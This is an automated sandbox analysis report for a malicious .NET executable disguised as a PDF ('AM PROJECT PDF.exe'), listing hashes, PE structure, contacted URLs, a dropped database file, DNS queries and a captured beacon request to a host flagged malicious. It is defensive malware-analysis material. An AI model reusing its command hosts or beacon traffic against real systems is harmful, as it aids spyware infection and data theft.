http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=1	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=2	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	false		high
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=5	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/bbs	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=6	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.js?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=3	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/bbs/board.php?bo_table=photo&wr_id=4	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	262I-Au.18.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	svchost.exe, 00000012.00000003.502087892.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, 262I-Au.18.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/theme/tailwind0.3	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com/bbs/register.php	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/bbs/content.php?co_id=provision	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://github.com/CJxD/CoreView	AM PROJECT PDF.exe	false		high
http://www.jiyu-kobo.co.jp/	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fellyhub.com/theme/tailwind0.3/skin/latest/pic_list/style.css?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	AM PROJECT PDF.exe, 00000000.00000002.312500796.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fellyhub.com/theme/tailwind0.3/css/dark.css?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fellyhub.com/theme/tailwind0.3/css/balloon.css?ver=220620	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	262I-Au.18.dr	false		high
http://www.fellyhub.com/theme/tailwind0.3/img/main_bn.jpg	svchost.exe, 00000012.00000002.530143936.0000000003E86000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 00000012.00000002.530717669.0000000006060000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.194.111	fellyhub.com	United States		46606	UNIFIEDLAYER-AS-1US	true
34.102.136.180	soraligne.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	708243
Start date and time:	2022-09-23 07:59:00 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	AM PROJECT PDF.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/2@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 44.2% (good quality ratio 38.6%) Quality average: 71.9% Quality standard deviation: 33.2%
HCA Information:	Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: AM PROJECT PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
08:00:13	API Interceptor	1x Sleep call for process: AM PROJECT PDF.exe modified

Process:	C:\Users\user\Desktop\AM PROJECT PDF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:	2E016B886BDB8389D2DD0867BE55F87B
SHA1:	25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:	1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:	C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\262I-Au

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.736740169866898
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	AM PROJECT PDF.exe
File size:	1038336
MD5:	05069262cd099b2e37afb5afe629d12d
SHA1:	5abfb565897213b0f747fa1843822e4b8b201f7d
SHA256:	ba162d7df1cd1beb851a29a69054491959d8ee6ad27f18b3e9dc57a3f6df1122
SHA512:	7c34ad25c03f846048e059fc9904724ec96299356187f55ac5c146fefb3484ae732a94d05aa5c16e3ca7f9638223eb07d516f055a17cf46908a12c9098216aea
SSDEEP:	12288:kcL7+q7bzP9QCymO8ChCy92qDrsKvUuITkQ2QwAw084BgqY93:kcfbbzlQCOJCy5D4Kc7AQXjY9
TLSH:	8625BE2133E84F57F07667F445A0D4B087B6BC1AE47AC20E1EC26CDFB4A6B518A61B17
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w*c..............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	78e4c4ccc4c4c0c0

Static PE Info

General

Entrypoint:	0x4ee216
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x632A77EC [Wed Sep 21 02:33:16 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xee1c4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf0000	0x10f44	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x102000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xec21c	0xec400	False	0.6586164847883598	data	6.846311012403682	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf0000	0x10f44	0x11000	False	0.22157915900735295	data	4.373301931095353	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x102000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xf0160	0x10828	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0x100988	0x14	data
RT_GROUP_ICON	0x10099c	0x14	data
RT_VERSION	0x1009b0	0x3a6	data
RT_MANIFEST	0x100d58	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2022 08:01:48.508534908 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:48.654256105 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.654519081 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:48.654603004 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:48.800158978 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833050013 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833084106 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833101034 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833118916 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833136082 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833152056 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833169937 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833185911 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833203077 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833219051 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.833359957 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:48.833425045 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:48.978997946 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979031086 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979043961 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979058027 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979074955 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979087114 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979104042 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979120016 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:48.979165077 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:48.979288101 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:48.979574919 CEST	49723	80	192.168.2.3	162.241.194.111
Sep 23, 2022 08:01:49.124996901 CEST	80	49723	162.241.194.111	192.168.2.3
Sep 23, 2022 08:01:59.042521954 CEST	49724	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:01:59.063441992 CEST	80	49724	34.102.136.180	192.168.2.3
Sep 23, 2022 08:01:59.064400911 CEST	49724	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:01:59.064711094 CEST	49724	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:01:59.083689928 CEST	80	49724	34.102.136.180	192.168.2.3
Sep 23, 2022 08:01:59.180953979 CEST	80	49724	34.102.136.180	192.168.2.3
Sep 23, 2022 08:01:59.181009054 CEST	80	49724	34.102.136.180	192.168.2.3
Sep 23, 2022 08:01:59.181216002 CEST	49724	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:00.075278997 CEST	49724	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:01.090866089 CEST	49725	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:01.110100031 CEST	80	49725	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:01.110256910 CEST	49725	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:01.110363007 CEST	49725	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:01.129406929 CEST	80	49725	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:01.226728916 CEST	80	49725	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:01.226764917 CEST	80	49725	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:01.226846933 CEST	49725	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:02.121881962 CEST	49725	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:03.137914896 CEST	49726	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:03.155391932 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.156671047 CEST	49726	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:03.156976938 CEST	49726	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:03.174263954 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.174299955 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.174315929 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.174331903 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.174346924 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.339262009 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.339327097 CEST	80	49726	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:03.339447975 CEST	49726	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:04.168901920 CEST	49726	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:05.184901953 CEST	49727	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:05.204296112 CEST	80	49727	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:05.204993963 CEST	49727	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:05.205039024 CEST	49727	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:05.225022078 CEST	80	49727	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:05.321933985 CEST	80	49727	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:05.321966887 CEST	80	49727	34.102.136.180	192.168.2.3
Sep 23, 2022 08:02:05.322124958 CEST	49727	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:05.322241068 CEST	49727	80	192.168.2.3	34.102.136.180
Sep 23, 2022 08:02:05.339489937 CEST	80	49727	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2022 08:01:48.316432953 CEST	49302	53	192.168.2.3	8.8.8.8
Sep 23, 2022 08:01:48.486849070 CEST	53	49302	8.8.8.8	192.168.2.3
Sep 23, 2022 08:01:59.001647949 CEST	53975	53	192.168.2.3	8.8.8.8
Sep 23, 2022 08:01:59.040911913 CEST	53	53975	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 23, 2022 08:01:48.316432953 CEST	192.168.2.3	8.8.8.8	0x108f	Standard query (0)	www.fellyhub.com	A (IP address)	IN (0x0001)	false
Sep 23, 2022 08:01:59.001647949 CEST	192.168.2.3	8.8.8.8	0xc1c3	Standard query (0)	www.soraligne.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 23, 2022 08:01:48.486849070 CEST	8.8.8.8	192.168.2.3	0x108f	No error (0)	www.fellyhub.com	fellyhub.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 23, 2022 08:01:48.486849070 CEST	8.8.8.8	192.168.2.3	0x108f	No error (0)	fellyhub.com		162.241.194.111	A (IP address)	IN (0x0001)	false
Sep 23, 2022 08:01:59.040911913 CEST	8.8.8.8	192.168.2.3	0xc1c3	No error (0)	www.soraligne.com	soraligne.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 23, 2022 08:01:59.040911913 CEST	8.8.8.8	192.168.2.3	0xc1c3	No error (0)	soraligne.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Sep 23, 2022 08:01:59.040911913 CEST	8.8.8.8	192.168.2.3	0xc1c3	No error (0)	soraligne.com		92.205.10.215	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.fellyhub.com

www.soraligne.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49723	162.241.194.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2022 08:01:48.654603004 CEST	7557	OUT	GET /rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== HTTP/1.1 Host: www.fellyhub.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 23, 2022 08:01:48.833050013 CEST	7559	IN	HTTP/1.1 200 OK Date: Fri, 23 Sep 2022 06:01:48 GMT Server: Apache P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" Expires: 0 Cache-Control: pre-check=0, post-check=0, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=cca758f014b60e69e0d3edb527ac4e8f; path=/ Set-Cookie: PHPSESSID=cca758f014b60e69e0d3edb527ac4e8f; path=/; secure; SameSite=None Set-Cookie: 2a0d2363701f23f8a75028924a3af643=ODQuMTcuNTIuNDM%3D; expires=Sat, 24-Sep-2022 06:01:48 GMT; Max-Age=86400; path=/ Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 23 Sep 2022 06:01:48 GMT Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 3e 0a 3c 74 69 74 6c 65 3e 46 65 6c 6c 79 48 75 62 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 73 2f 76 35 2e 33 2e 31 2f 63 73 73 2f 61 6c 6c 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 65 